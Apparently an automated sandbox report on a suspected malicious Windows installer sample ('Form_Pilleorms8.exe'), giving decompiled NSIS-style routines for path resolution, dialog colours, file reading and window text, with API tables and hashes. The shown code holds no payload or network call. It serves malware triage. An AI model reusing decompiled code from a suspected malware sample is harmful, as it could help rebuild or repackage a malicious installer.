                        								_t108 = _t108 + _t98;
                        								_t105 = _t105 + _t98;
                        							}
                        							L42:
                        							_t82 =  *_t105;
                        							_a8 = _t82;
                        							if(_t82 != 0) {
                        								_t81 = _a8;
                        								continue;
                        							}
                        							goto L43;
                        						}
                        						_t84 =  *((intOrPtr*)(_t105 + 1));
                        						_t47 =  *_t105;
                        						_t48 = _t47 & 0x000000ff;
                        						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                        						_t85 = _t84 & 0x000000ff;
                        						_v28 = _t48 | 0x00008000;
                        						_t77 = 2;
                        						_v16 = _t85;
                        						_t105 = _t105 + _t77;
                        						_v24 = _t48;
                        						_v20 = _t85 | 0x00008000;
                        						if(_a8 != _t77) {
                        							__eflags = _a8 - 3;
                        							if(_a8 != 3) {
                        								__eflags = _a8 - 1;
                        								if(__eflags == 0) {
                        									__eflags = (_t48 | 0xffffffff) - _v12;
                        									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                        								}
                        								L38:
                        								_t108 =  &(_t108[lstrlenW(_t108)]);
                        								_t45 = 0x432ea0;
                        								goto L42;
                        							}
                        							_t78 = _v12;
                        							__eflags = _t78 - 0x1d;
                        							if(_t78 != 0x1d) {
                        								__eflags = (_t78 << 0xb) + 0x436000;
                        								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                        							} else {
                        								E00406484(_t108,  *0x434f08);
                        							}
                        							__eflags = _t78 + 0xffffffeb - 7;
                        							if(__eflags < 0) {
                        								L29:
                        								E004067C4(_t108);
                        							}
                        							goto L38;
                        						}
                        						if( *0x434f84 != 0) {
                        							_t77 = 4;
                        						}
                        						_t121 = _t48;
                        						if(_t48 >= 0) {
                        							__eflags = _t48 - 0x25;
                        							if(_t48 != 0x25) {
                        								__eflags = _t48 - 0x24;
                        								if(_t48 == 0x24) {
                        									GetWindowsDirectoryW(_t108, 0x400);
                        									_t77 = 0;
                        								}
                        								while(1) {
                        									__eflags = _t77;
                        									if(_t77 == 0) {
                        										goto L26;
                        									}
                        									_t59 =  *0x434f04;
                        									_t77 = _t77 - 1;
                        									__eflags = _t59;
                        									if(_t59 == 0) {
                        										L22:
                        										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                        										__eflags = _t61;
                        										if(_t61 != 0) {
                        											L24:
                        											 *_t108 =  *_t108 & 0x00000000;
                        											__eflags =  *_t108;
                        											continue;
                        										}
                        										__imp__SHGetPathFromIDListW(_v8, _t108);
                        										_a8 = _t61;
                        										__imp__CoTaskMemFree(_v8);
                        										__eflags = _a8;
                        										if(_a8 != 0) {
                        											goto L26;
                        										}
                        										goto L24;
                        									}
                        									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                        									__eflags = _t63;
                        									if(_t63 == 0) {
                        										goto L26;
                        									}
                        									goto L22;
                        								}
                        								goto L26;
                        							}
                        							GetSystemDirectoryW(_t108, 0x400);
                        							goto L26;
                        						} else {
                        							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                        							if( *_t108 != 0) {
                        								L27:
                        								if(_v16 == 0x1a) {
                        									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                        								}
                        								goto L29;
                        							}
                        							E0040657A(_t77, _t105, _t108, _t108, _v16);
                        							L26:
                        							if( *_t108 == 0) {
                        								goto L29;
                        							}
                        							goto L27;
                        						}
                        					}
                        					goto L43;
                        				}
                        			}





























                        0x0040657a
                        0x0040657a
                        0x0040657a
                        0x00406580
                        0x00406585
                        0x00406596
                        0x00406596
                        0x0040659e
                        0x0040659f
                        0x004065a0
                        0x004065a1
                        0x004065a4
                        0x004065ac
                        0x004065ae
                        0x004065bf
                        0x004065c2
                        0x004065c2
                        0x004065c6
                        0x004065cc
                        0x004065cf
                        0x004067aa
                        0x004067aa
                        0x004067b5
                        0x004067c1
                        0x004067c1
                        0x00000000
                        0x004065d5
                        0x004065da
                        0x004065ef
                        0x004065f0
                        0x004065f6
                        0x00406788
                        0x00406796
                        0x00406799
                        0x00406799
                        0x0040678a
                        0x0040678d
                        0x00406790
                        0x00406792
                        0x00406792
                        0x0040679b
                        0x0040679b
                        0x004067a1
                        0x004067a4
                        0x004065d7
                        0x00000000
                        0x004065d7
                        0x00000000
                        0x004067a4
                        0x004065fc
                        0x004065ff
                        0x0040660e
                        0x00406615
                        0x00406621
                        0x00406624
                        0x00406627
                        0x00406628
                        0x0040662d
                        0x00406633
                        0x00406636
                        0x00406639
                        0x0040672c
                        0x00406731
                        0x00406764
                        0x00406769
                        0x0040676e
                        0x00406773
                        0x00406773
                        0x00406778
                        0x0040677e
                        0x00406781
                        0x00000000
                        0x00406781
                        0x00406733
                        0x00406736
                        0x00406739
                        0x0040674e
                        0x00406755
                        0x0040673b
                        0x00406742
                        0x00406742
                        0x0040675d
                        0x00406760
                        0x00406724
                        0x00406725
                        0x00406725
                        0x00000000
                        0x00406760
                        0x00406646
                        0x0040664a
                        0x0040664a
                        0x0040664b
                        0x0040664d
                        0x0040668a
                        0x0040668d
                        0x0040669d
                        0x004066a0
                        0x004066a8
                        0x004066ae
                        0x004066ae
                        0x00406709
                        0x00406709
                        0x0040670b
                        0x00000000
                        0x00000000
                        0x004066b2
                        0x004066b7
                        0x004066b8
                        0x004066ba
                        0x004066d1
                        0x004066df
                        0x004066e5
                        0x004066e7
                        0x00406705
                        0x00406705
                        0x00406705
                        0x00000000
                        0x00406705
                        0x004066ed
                        0x004066f6
                        0x004066f9
                        0x004066ff
                        0x00406703
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406703
                        0x004066cb
                        0x004066cd
                        0x004066cf
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004066cf
                        0x00000000
                        0x00406709
                        0x00406695
                        0x00000000
                        0x0040664f
                        0x0040666d
                        0x00406676
                        0x00406713
                        0x00406717
                        0x0040671f
                        0x0040671f
                        0x00000000
                        0x00406717
                        0x00406680
                        0x0040670d
                        0x00406711
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406711
                        0x0040664d
                        0x00000000
                        0x004065da

                        APIs
                        • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,00000400), ref: 00406695
                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,?,73BCEA30), ref: 004066A8
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Directory$SystemWindowslstrcatlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                        • API String ID: 4260037668-1572511252
                        • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                        • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                        • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                        • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                        				struct tagLOGBRUSH _v16;
                        				long _t39;
                        				long _t41;
                        				void* _t44;
                        				signed char _t50;
                        				long* _t54;
                        
                        				if(_a4 + 0xfffffecd > 5) {
                        					L18:
                        					return 0;
                        				}
                        				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                        				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                        					goto L18;
                        				} else {
                        					_t50 = _t54[5];
                        					if((_t50 & 0xffffffe0) != 0) {
                        						goto L18;
                        					}
                        					_t39 =  *_t54;
                        					if((_t50 & 0x00000002) != 0) {
                        						_t39 = GetSysColor(_t39);
                        					}
                        					if((_t54[5] & 0x00000001) != 0) {
                        						SetTextColor(_a8, _t39);
                        					}
                        					SetBkMode(_a8, _t54[4]);
                        					_t41 = _t54[1];
                        					_v16.lbColor = _t41;
                        					if((_t54[5] & 0x00000008) != 0) {
                        						_t41 = GetSysColor(_t41);
                        						_v16.lbColor = _t41;
                        					}
                        					if((_t54[5] & 0x00000004) != 0) {
                        						SetBkColor(_a8, _t41);
                        					}
                        					if((_t54[5] & 0x00000010) != 0) {
                        						_v16.lbStyle = _t54[2];
                        						_t44 = _t54[3];
                        						if(_t44 != 0) {
                        							DeleteObject(_t44);
                        						}
                        						_t54[3] = CreateBrushIndirect( &_v16);
                        					}
                        					return _t54[3];
                        				}
                        			}









                        0x00404512
                        0x004045c8
                        0x00000000
                        0x004045c8
                        0x00404523
                        0x00404527
                        0x00000000
                        0x00404541
                        0x00404541
                        0x0040454a
                        0x00000000
                        0x00000000
                        0x0040454c
                        0x00404558
                        0x0040455b
                        0x0040455b
                        0x00404561
                        0x00404567
                        0x00404567
                        0x00404573
                        0x00404579
                        0x00404580
                        0x00404583
                        0x00404586
                        0x00404588
                        0x00404588
                        0x00404590
                        0x00404596
                        0x00404596
                        0x004045a0
                        0x004045a5
                        0x004045a8
                        0x004045ad
                        0x004045b0
                        0x004045b0
                        0x004045c0
                        0x004045c0
                        0x00000000
                        0x004045c3

                        APIs
                        • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                        • GetSysColor.USER32(00000000), ref: 0040455B
                        • SetTextColor.GDI32(?,00000000), ref: 00404567
                        • SetBkMode.GDI32(?,?), ref: 00404573
                        • GetSysColor.USER32(?), ref: 00404586
                        • SetBkColor.GDI32(?,?), ref: 00404596
                        • DeleteObject.GDI32(?), ref: 004045B0
                        • CreateBrushIndirect.GDI32(?), ref: 004045BA
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                        • String ID:
                        • API String ID: 2320649405-0
                        • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                        • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                        • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                        • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                        				intOrPtr _t65;
                        				intOrPtr _t66;
                        				intOrPtr _t72;
                        				void* _t76;
                        				void* _t79;
                        
                        				_t72 = __edx;
                        				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                        				_t65 = 2;
                        				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                        				_t66 = E00402D84(_t65);
                        				_t79 = _t66 - 1;
                        				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                        				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                        				if(_t79 < 0) {
                        					L36:
                        					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                        				} else {
                        					__ecx = 0x3ff;
                        					if(__eax > 0x3ff) {
                        						 *(__ebp - 0x44) = 0x3ff;
                        					}
                        					if( *__edi == __bx) {
                        						L34:
                        						__ecx =  *(__ebp - 0xc);
                        						__eax =  *(__ebp - 8);
                        						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                        						if(_t79 == 0) {
                        							 *(_t76 - 4) = 1;
                        						}
                        						goto L36;
                        					} else {
                        						 *(__ebp - 0x38) = __ebx;
                        						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                        						if( *(__ebp - 0x44) > __ebx) {
                        							do {
                        								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                        									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                        										__eax = __ebp - 0x50;
                        										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                        											goto L34;
                        										} else {
                        											goto L21;
                        										}
                        									} else {
                        										goto L34;
                        									}
                        								} else {
                        									__eax = __ebp - 0x40;
                        									_push(__ebx);
                        									_push(__ebp - 0x40);
                        									__eax = 2;
                        									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                        									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                        									if(__eax == 0) {
                        										goto L34;
                        									} else {
                        										__ecx =  *(__ebp - 0x40);
                        										if(__ecx == __ebx) {
                        											goto L34;
                        										} else {
                        											__ax =  *(__ebp + 0xa) & 0x000000ff;
                        											 *(__ebp - 0x4c) = __ecx;
                        											 *(__ebp - 0x50) = __eax;
                        											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                        												L28:
                        												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                        											} else {
                        												__ebp - 0x50 = __ebp + 0xa;
                        												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                        													L21:
                        													__eax =  *(__ebp - 0x50);
                        												} else {
                        													__edi =  *(__ebp - 0x4c);
                        													__edi =  ~( *(__ebp - 0x4c));
                        													while(1) {
                        														_t22 = __ebp - 0x40;
                        														 *_t22 =  *(__ebp - 0x40) - 1;
                        														__eax = 0xfffd;
                        														 *(__ebp - 0x50) = 0xfffd;
                        														if( *_t22 == 0) {
                        															goto L22;
                        														}
                        														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                        														__edi = __edi + 1;
                        														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                        														__eax = __ebp + 0xa;
                        														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                        															continue;
                        														} else {
                        															goto L21;
                        														}
                        														goto L22;
                        													}
                        												}
                        												L22:
                        												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                        													goto L28;
                        												} else {
                        													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                        														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                        															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                        															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                        														} else {
                        															__ecx =  *(__ebp - 0xc);
                        															__edx =  *(__ebp - 8);
                        															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                        															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                        														}
                        														goto L34;
                        													} else {
                        														__ecx =  *(__ebp - 0xc);
                        														__edx =  *(__ebp - 8);
                        														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                        														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                        														 *(__ebp - 0x38) = __eax;
                        														if(__ax == __bx) {
                        															goto L34;
                        														} else {
                        															goto L26;
                        														}
                        													}
                        												}
                        											}
                        										}
                        									}
                        								}
                        								goto L37;
                        								L26:
                        								__eax =  *(__ebp - 8);
                        							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                        						}
                        						goto L34;
                        					}
                        				}
                        				L37:
                        				return 0;
                        			}








                        0x004026ec
                        0x004026ee
                        0x004026f1
                        0x004026f3
                        0x004026f6
                        0x004026fb
                        0x004026ff
                        0x00402702
                        0x00402705
                        0x00402c2a
                        0x00402c2d
                        0x0040270b
                        0x0040270b
                        0x00402712
                        0x00402714
                        0x00402714
                        0x0040271a
                        0x0040287e
                        0x0040287e
                        0x00402881
                        0x00402886
                        0x004015b6
                        0x0040292e
                        0x0040292e
                        0x00000000
                        0x00402720
                        0x00402721
                        0x0040272c
                        0x0040272f
                        0x0040273b
                        0x0040273f
                        0x004027d7
                        0x004027ef
                        0x004027ff
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402745
                        0x00402745
                        0x00402748
                        0x00402749
                        0x0040274c
                        0x00402751
                        0x00402758
                        0x00402760
                        0x00000000
                        0x00402766
                        0x00402766
                        0x0040276b
                        0x00000000
                        0x00402771
                        0x00402771
                        0x00402779
                        0x0040277c
                        0x0040277f
                        0x0040283a
                        0x00402841
                        0x00402785
                        0x0040278b
                        0x00402797
                        0x00402801
                        0x00402801
                        0x00402799
                        0x00402799
                        0x0040279c
                        0x0040279e
                        0x0040279e
                        0x0040279e
                        0x004027a1
                        0x004027a6
                        0x004027a9
                        0x00000000
                        0x00000000
                        0x004027ab
                        0x004027ae
                        0x004027bc
                        0x004027c2
                        0x004027d0
                        0x00000000
                        0x004027d2
                        0x00000000
                        0x004027d2
                        0x00000000
                        0x004027d0
                        0x0040279e
                        0x00402804
                        0x00402807
                        0x00000000
                        0x00402809
                        0x0040280e
                        0x0040284f
                        0x00402871
                        0x00402878
                        0x0040285d
                        0x0040285d
                        0x00402860
                        0x00402863
                        0x00402866
                        0x00402866
                        0x00000000
                        0x00402817
                        0x00402817
                        0x0040281a
                        0x0040281d
                        0x00402823
                        0x00402827
                        0x0040282a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040282a
                        0x0040280e
                        0x00402807
                        0x0040277f
                        0x0040276b
                        0x00402760
                        0x00000000
                        0x0040282c
                        0x0040282c
                        0x0040282f
                        0x00402838
                        0x00000000
                        0x0040272f
                        0x0040271a
                        0x00402c33
                        0x00402c39

                        APIs
                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                          • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: File$Pointer$ByteCharMultiWide$Read
                        • String ID: 9
                        • API String ID: 163830602-2366072709
                        • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                        • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                        • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                        • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040559F(signed int _a4, WCHAR* _a8) {
                        				struct HWND__* _v8;
                        				signed int _v12;
                        				WCHAR* _v32;
                        				long _v44;
                        				int _v48;
                        				void* _v52;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				WCHAR* _t27;
                        				signed int _t28;
                        				long _t29;
                        				signed int _t37;
                        				signed int _t38;
                        
                        				_t27 =  *0x433ee4;
                        				_v8 = _t27;
                        				if(_t27 != 0) {
                        					_t37 =  *0x434fb4;
                        					_v12 = _t37;
                        					_t38 = _t37 & 0x00000001;
                        					if(_t38 == 0) {
                        						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                        					}
                        					_t27 = lstrlenW(0x42c248);
                        					_a4 = _t27;
                        					if(_a8 == 0) {
                        						L6:
                        						if((_v12 & 0x00000004) == 0) {
                        							_t27 = SetWindowTextW( *0x433ec8, 0x42c248);
                        						}
                        						if((_v12 & 0x00000002) == 0) {
                        							_v32 = 0x42c248;
                        							_v52 = 1;
                        							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                        							_v44 = 0;
                        							_v48 = _t29 - _t38;
                        							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                        							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                        						}
                        						if(_t38 != 0) {
                        							_t28 = _a4;
                        							0x42c248[_t28] = 0;
                        							return _t28;
                        						}
                        					} else {
                        						_t27 = lstrlenW(_a8) + _a4;
                        						if(_t27 < 0x1000) {
                        							_t27 = lstrcatW(0x42c248, _a8);
                        							goto L6;
                        						}
                        					}
                        				}
                        				return _t27;
                        			}

















                        0x004055a5
                        0x004055af
                        0x004055b4
                        0x004055ba
                        0x004055c5
                        0x004055c8
                        0x004055cb
                        0x004055d1
                        0x004055d1
                        0x004055d7
                        0x004055df
                        0x004055e2
                        0x004055ff
                        0x00405603
                        0x0040560c
                        0x0040560c
                        0x00405616
                        0x0040561f
                        0x0040562b
                        0x00405632
                        0x00405636
                        0x00405639
                        0x0040564c
                        0x0040565a
                        0x0040565a
                        0x0040565e
                        0x00405660
                        0x00405663
                        0x00000000
                        0x00405663
                        0x004055e4
                        0x004055ec
                        0x004055f4
                        0x004055fa
                        0x00000000
                        0x004055fa
                        0x004055f4
                        0x004055e2
                        0x0040566f

                        APIs
                        • lstrlenW.KERNEL32(0042C248,00000000,?,73BCEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                        • lstrlenW.KERNEL32(00403418,0042C248,00000000,?,73BCEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                        • lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                        • SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                          • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                          • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSendlstrlen$lstrcat$TextWindow
                        • String ID:
                        • API String ID: 1495540970-0
                        • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                        • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                        • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                        • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E004067C4(WCHAR* _a4) {
                        				short _t5;
                        				short _t7;
                        				WCHAR* _t19;
                        				WCHAR* _t20;
                        				WCHAR* _t21;
                        
                        				_t20 = _a4;
                        				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                        					_t20 =  &(_t20[4]);
                        				}
                        				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                        					_t20 =  &(_t20[2]);
                        				}
                        				_t5 =  *_t20;
                        				_t21 = _t20;
                        				_t19 = _t20;
                        				if(_t5 != 0) {
                        					do {
                        						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                        							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                        							_t19 = CharNextW(_t19);
                        						}
                        						_t20 = CharNextW(_t20);
                        						_t5 =  *_t20;
                        					} while (_t5 != 0);
                        				}
                        				 *_t19 =  *_t19 & 0x00000000;
                        				while(1) {
                        					_push(_t19);
                        					_push(_t21);
                        					_t19 = CharPrevW();
                        					_t7 =  *_t19;
                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                        						break;
                        					}
                        					 *_t19 =  *_t19 & 0x00000000;
                        					if(_t21 < _t19) {
                        						continue;
                        					}
                        					break;
                        				}
                        				return _t7;
                        			}








                        0x004067c6
                        0x004067cf
                        0x004067e6
                        0x004067e6
                        0x004067ed
                        0x004067f9
                        0x004067f9
                        0x004067fc
                        0x004067ff
                        0x00406804
                        0x00406806
                        0x0040680f
                        0x00406813
                        0x00406830
                        0x00406838
                        0x00406838
                        0x0040683d
                        0x0040683f
                        0x00406842
                        0x00406847
                        0x00406848
                        0x0040684c
                        0x0040684c
                        0x0040684d
                        0x00406854
                        0x00406856
                        0x0040685d
                        0x00000000
                        0x00000000
                        0x00406865
                        0x0040686b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040686b
                        0x00406870
